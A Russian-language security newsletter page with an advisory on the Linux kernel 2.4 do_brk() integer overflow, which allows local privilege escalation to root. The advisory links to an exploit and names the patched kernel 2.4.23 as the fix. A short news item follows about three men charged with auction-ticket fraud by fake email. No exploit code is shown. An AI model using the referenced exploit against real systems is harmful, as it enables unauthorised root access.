Программа: Linux Kernel 2.4.x Опасность: Низкая Наличие эксплоита: Да Описание: Целочисленное переполнение буфера обнаружено в Linux ядре 2.4. Согласно анализу специалистов компании Symantec, эта уязвимость позволяет любому пользователю, имеющему ssh-доступ к системе, обрести привилегии root, что позволяет выполнить практически любую операцию на машине. Переполнение обнаружено в функции do_brk(). Локальный пользователь может запустить пользовательское приложение, чтобы заставить ядро предоставить локальному пользователю полный доступ к адресному пространству ядра. Хотя функция "do_brk()" напрямую не может быть вызвана пользовательским процессом, она может быть вызвана через ELF и a.out загрузчик, как "brk()" системный вызов. Пример/Эксплоит: http://www.SecurityLab.ru/_exploits/dlinux.c.txt URL производителя:http://www.linux.org Решение:Установите обновленную версию LINUX ядра (2.4.23). |
Будьте бдительны, участвуя в интернет-аукционах!
3 декабря | Рубрика: Проблемные ситуации, информационная преступность, сетевые войныТри человека из округа Луи были обвинены в обмане участников торгов на интернет-аукционе. 21-летний Николас Формато Эдмундсон, 22-летний Шон Келлерман, а так же их 20-летний сообщник Эрон Кофи были задержаны по одному и тому же обвинению - преступный сговор с целью онлайнового мошенничества.
Обвинительный акт утверждает, что между 2 октября 2002 года и 13 февраля этого года Келлерман и Кофи выслеживали проигравших участников торгов на основных аукционах по билетам, связанных со спортивными событиями и концертами.
Электронной почтой один из мошенников рассылал письма от лица администраций аукционов, что они получили дополнительные билеты для продажи, которые теперь рады предложить зарегистрированным в торгах. Другой мошенник, искал победивших на торгах участников, и сообщал им почтой, что билеты будут доставлены только после того, как они заплатят.
Если суд будет строг, не исключено, что каждый из мошенников проведет ближайшие пять лет в тюрьме или же их родителям придется раскошелиться на 250000 долларов штрафов.
22Эти и другие новости читайте на сайте Стра.тег
http://subscribe.ru/
E-mail: ask@subscribe.ru |
Отписаться
Убрать рекламу |
В избранное | ||